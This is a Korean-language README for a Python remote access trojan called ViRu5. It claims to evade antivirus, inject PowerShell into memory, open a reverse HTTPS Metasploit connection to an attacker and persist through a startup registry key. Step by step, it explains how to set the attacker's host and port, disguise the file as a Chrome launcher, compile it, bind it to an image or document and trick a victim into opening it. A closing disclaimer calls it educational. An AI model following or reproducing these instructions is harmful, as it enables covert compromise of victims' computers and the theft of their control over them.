python-rootkit
이것은 거의 모든 안티바이러스를 우회하고 윈도우 머신 내부에 백도어를 열어 청취 머신으로 역방향 https Metasploit 연결을 설정하는 완전히 탐지되지 않는 python RAT입니다.
ViRu5 생명 주기
- 모든 안티바이러스 우회.
- 악성 파워쉘 스크립트를 메모리에 주입.
- 공격자 머신으로 역방향 https 연결 설정.
- 10초마다 확인하여 연결이 여전히 존재하는지 확인하고, 그렇지 않으면 새 연결을 재설정.
- 재부팅 후 공격자에게 다시 연결하기 위해 시작 레지스트리 키 추가.
단계
- viRu5/source.py의 파라미터를 당신의 lhost와 lport로 업데이트
- source.py 이름을 GoogleChromeAutoLaunch.py로 변경
- GoogleChromeAutoLaunch.py, setup.py 및 당신의 아이콘을 icon.ico로 c:\python27 디렉토리에 추가
- cmd에서 다음을 실행
cd c:\python27 && python setup.py py2exe
- Dist 디렉토리에서 RAT 파일을 찾으세요.
- 어떤 사진, PDF, Word 또는 모든 종류의 파일과 결합하세요.
- 피해자에게 보내세요.
- 사회공학 기술을 사용하여 그가 파일을 열도록 유도하세요.
- 역방향 https metasploit 연결을 받게 됩니다 :)
테스트 환경
- Windows 7 x64/x86
- Windows 8
- Windows 8.1 x64/x86
- Windows 10 x64/x86
감사합니다
사람들을 돕고 커뮤니티를 더 강력하게 만들기 위해 시간을 투자한 모든 보안 연구원에게 감사드립니다. powerShellEmpire 팀에게도 감사드립니다.
면책 조항
이것은 교육 목적으로만 제공됩니다. 무엇보다 이 코드는 패치되지 않은 머신을 감염시키는 보안 문제에 대해 사람들에게 경고하기 위한 것입니다.